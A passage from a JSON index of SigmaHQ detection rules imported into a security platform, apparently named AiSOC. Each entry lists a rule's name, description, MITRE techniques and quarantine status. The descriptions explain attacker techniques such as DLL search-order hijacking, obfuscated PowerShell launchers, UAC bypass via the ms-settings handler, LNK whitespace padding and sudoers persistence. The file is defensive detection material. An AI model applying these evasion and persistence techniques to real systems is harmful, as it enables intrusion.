"detections/sigma-imports/_quarantine/potential-wazuh-security-platform-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_wazuh.yml" } }, { "id": "sigmahq-sigma-db809f10-56ce-4420-8c86-d6a7d793c79c", "type": "detection", "name": "Potential Defense Evasion Via Raw Disk Access By Uncommon Tools", "description": "Detects raw disk access using uncommon tools or tools that are located in suspicious locations (heavy filtering is required), which could indicate possible defense evasion attempts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-defense-evasion-via-raw-disk-access-by-uncommon-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "db809f10-56ce-4420-8c86-d6a7d793c79c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/raw_access_thread/raw_access_thread_susp_disk_access_using_uncommon_tools.yml" } }, { "id": "sigmahq-sigma-db885529-903f-4c5d-9864-28fe199e6370", "type": "detection", "name": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell", "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/computer-discovery-and-export-via-get-adcomputer-cmdlet-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "db885529-903f-4c5d-9864-28fe199e6370", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml" } }, { "id": "sigmahq-sigma-db92dd33-a3ad-49cf-8c2c-608c3e30ace0", "type": "detection", "name": "Invoke-Obfuscation Via Use Clip - Powershell", "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-clip-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml" } }, { "id": "sigmahq-sigma-dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", "type": "detection", "name": "Potential Initial Access via DLL Search Order Hijacking", "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566", "T1566.001", "T1574", "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-initial-access-via-dll-search-order-hijacking.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml" } }, { "id": "sigmahq-sigma-dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", "type": "detection", "name": "Delete Important Scheduled Task", "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/delete-important-scheduled-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_delete.yml" } }, { "id": "sigmahq-sigma-dbe4b9c5-c254-4258-9688-d6af0b7967fd", "type": "detection", "name": "Screen Capture with Import Tool", "description": "Detects adversary creating screen capture of a desktop with Import Tool.\nHighly recommended using rule on servers, due to high usage of screenshot utilities on user workstations.\nImageMagick must be installed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/screen-capture-with-import-tool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dbe4b9c5-c254-4258-9688-d6af0b7967fd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_screencapture_import.yml" } }, { "id": "sigmahq-sigma-dbfc7c98-04ab-4ab7-aa94-c74d22aa7376", "type": "detection", "name": "Potentially Suspicious Malware Callback Communication - Linux", "description": "Detects programs that connect to known malware callback ports based on threat intelligence reports.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1571" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-malware-callback-communication-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dbfc7c98-04ab-4ab7-aa94-c74d22aa7376", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/network_connection/net_connection_lnx_susp_malware_callback_port.yml" } }, { "id": "sigmahq-sigma-dc4576d4-7467-424f-9eee-fd2b02855fe0", "type": "detection", "name": "Suspicious Cabinet File Execution Via Msdt.EXE", "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-cabinet-file-execution-via-msdt-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dc4576d4-7467-424f-9eee-fd2b02855fe0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml" } }, { "id": "sigmahq-sigma-dc5c24af-6995-49b2-86eb-a9ff62199e82", "type": "detection", "name": "COM Hijacking via TreatAs", "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.015" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/com-hijacking-via-treatas.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dc5c24af-6995-49b2-86eb-a9ff62199e82", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_treatas_persistence.yml" } }, { "id": "sigmahq-sigma-dca8991c-cb16-4128-abf8-6b11e5cd156f", "type": "detection", "name": "GitHub Repository Archive Status Changed", "description": "Detects when a GitHub repository is archived or unarchived, which may indicate unauthorized changes to repository status.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-repository-archive-status-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dca8991c-cb16-4128-abf8-6b11e5cd156f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_repository_archive_status_changed.yml" } }, { "id": "sigmahq-sigma-dcaa3f04-70c3-427a-80b4-b870d73c94c4", "type": "detection", "name": "Dynamic .NET Compilation Via Csc.EXE", "description": "Detects execution of \"csc.exe\" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dynamic-net-compilation-via-csc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml" } }, { "id": "sigmahq-sigma-dcd74b95-3f36-4ed9-9598-0490951643aa", "type": "detection", "name": "PowerView PowerShell Cmdlets - ScriptBlock", "description": "Detects Cmdlet names from PowerView of the PowerSploit exploitation framework.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powerview-powershell-cmdlets-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dcd74b95-3f36-4ed9-9598-0490951643aa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml" } }, { "id": "sigmahq-sigma-dcdbc940-0bff-46b2-95f3-2d73f848e33b", "type": "detection", "name": "Suspicious Spool Service Child Process", "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1203", "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-spool-service-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml" } }, { "id": "sigmahq-sigma-dcf2db1f-f091-425b-a821-c05875b8925a", "type": "detection", "name": "Invoke-Obfuscation VAR+ Launcher - Security", "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-var-launcher-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dcf2db1f-f091-425b-a821-c05875b8925a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_invoke_obfuscation_var_services_security.yml" } }, { "id": "sigmahq-sigma-dcff7e85-d01f-4eb5-badd-84e2e6be8294", "type": "detection", "name": "Windows Default Domain GPO Modification via GPME", "description": "Detects the use of the Group Policy Management Editor (GPME) to modify Default Domain or Default Domain Controllers Group Policy Objects (GPOs).\nAdversaries may leverage GPME to make stealthy changes in these default GPOs to deploy malicious GPOs configurations across the domain without raising suspicion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-default-domain-gpo-modification-via-gpme.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dcff7e85-d01f-4eb5-badd-84e2e6be8294", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mmc_default_domain_gpo_modification_via_gpme.yml" } }, { "id": "sigmahq-sigma-dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c", "type": "detection", "name": "Suspicious Scheduled Task Creation via Masqueraded XML File", "description": "Detects the creation of a scheduled task using the \"-XML\" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.005", "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-scheduled-task-creation-via-masqueraded-xml-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml" } }, { "id": "sigmahq-sigma-dd3ee8cc-f751-41c9-ba53-5a32ed47e563", "type": "detection", "name": "Registry Modification of MS-settings Protocol Handler", "description": "Detects registry modifications to the 'ms-settings' protocol handler, which is frequently targeted for UAC bypass or persistence.\nAttackers can modify this registry to execute malicious code with elevated privileges by hijacking the command execution path.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002", "T1546.001", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-modification-of-ms-settings-protocol-handler.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_registry_modification_of_ms_setting_protocol_handler.yml" } }, { "id": "sigmahq-sigma-dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", "type": "detection", "name": "Use NTFS Short Name in Command Line", "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-ntfs-short-name-in-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml" } }, { "id": "sigmahq-sigma-dd80db93-6ec2-4f4c-a017-ad40da6ffe81", "type": "detection", "name": "Windows Defender Real-Time Protection Failure/Restart", "description": "Detects issues with Windows Defender Real-Time Protection features", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/windows-defender-real-time-protection-failure-restart.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dd80db93-6ec2-4f4c-a017-ad40da6ffe81", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_real_time_protection_errors.yml" } }, { "id": "sigmahq-sigma-dd857d3e-0c6e-457b-9b48-e82ae7f86bd7", "type": "detection", "name": "New Module Module Added To IIS Server", "description": "Detects the addition of a new module to an IIS server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685.001", "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-module-module-added-to-iis-server.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dd857d3e-0c6e-457b-9b48-e82ae7f86bd7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/iis-configuration/win_iis_module_added.yml" } }, { "id": "sigmahq-sigma-dd8756e7-a3a0-4768-b47e-8f545d1a751c", "type": "detection", "name": "Suspicious LNK Command-Line Padding with Whitespace Characters", "description": "Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D).\nAdversaries insert non-printable whitespace characters (e.g., Line Feed \\x0A, Carriage Return \\x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary.\nThe hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion\u2014commonly used for social engineering attacks.\nThis rule flags suspicious use of such padding observed in real-world attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-lnk-command-line-padding-with-whitespace-characters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dd8756e7-a3a0-4768-b47e-8f545d1a751c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_lnk_exec_hidden_cmd.yml" } }, { "id": "sigmahq-sigma-ddb26b76-4447-4807-871f-1b035b2bfa5d", "type": "detection", "name": "Persistence Via Sudoers.d Files", "description": "Detects the creation or modification of files within the \"sudoers.d\" directory on Linux systems.\nSuch activity may indicate an attempt to establish or maintain privilege escalation by granting specific users elevated permissions.\nUnauthorized changes to sudoers files are a common technique used by attackers to persist administrative access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/persistence-via-sudoers-d-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ddb26b76-4447-4807-871f-1b035b2bfa5d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml" } }, { "id": "sigmahq-sigma-ddbbe845-1d74-43a8-8231-2156d180234d", "type": "detection", "name": "FortiGate - New Local User Created", "description": "Detects the creation of a new local user on a Fortinet FortiGate Firewall.\nThe new local user could be used for VPN connections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/fortigate-new-local-user-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ddbbe845-1d74-43a8-8231-2156d180234d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/fortinet/fortigate/fortinet_fortigate_new_local_user_created.yml" } }, { "id": "sigmahq-sigma-ddcd88cb-7f62-4ce5-86f9-1704190feb0a", "type": "detection", "name": "Potential In-Memory Execution Using Reflection.Assembly", "description": "Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1620" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-in-memory-execution-using-reflection-assembly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_dotnet_assembly_from_file.yml" } }, { "id": "sigmahq-sigma-ddd171b5-2cc6-4975-9e78-f0eccd08cc76", "type": "detection", "name": "Potential Persistence Via Outlook Home Page", "description": "Detects potential persistence activity via outlook home page.\nAn attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-outlook-home-page.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_outlook_homepage.yml" } }, { "id": "sigmahq-sigma-dddfebae-c46f-439c-af7a-fdb6bde90218", "type": "detection", "name": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction", "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/syncappvpublishingserver-execution-to-bypass-powershell-restriction.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dddfebae-c46f-439c-af7a-fdb6bde90218", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml" } }, { "id": "sigmahq-sigma-dde85b37-40cd-4a94-b00c-0b8794f956b5", "type": "detection", "name": "Remote Task Creation via ATSVC Named Pipe - Zeek", "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-task-creation-via-atsvc-named-pipe-zeek.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dde85b37-40cd-4a94-b00c-0b8794f956b5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml" } }, { "id": "sigmahq-sigma-ddeff553-5233-4ae9-bbab-d64d2bd634be", "type": "detection", "name": "Data Copied To Clipboard Via Clip.EXE", "description": "Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1115" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/data-copied-to-clipboard-via-clip-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ddeff553-5233-4ae9-bbab-d64d2bd634be", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_clip_execution.yml" } }, { "id": "sigmahq-sigma-ddf36b67-e872-4507-ab2e-46bda21b842c", "type": "detection", "name": "Local System Accounts Discovery - MacOs", "description": "Detects enumeration of local systeam accounts on MacOS", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1087.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/local-system-accounts-discovery-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ddf36b67-e872-4507-ab2e-46bda21b842c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_local_account.yml" } }, { "id": "sigmahq-sigma-de16d92c-c446-4d53-8938-10aeef41c8b6", "type": "detection", "name": "Computer Password Change Via Ksetup.EXE", "description": "Detects password change for the computer's domain account or host principal via 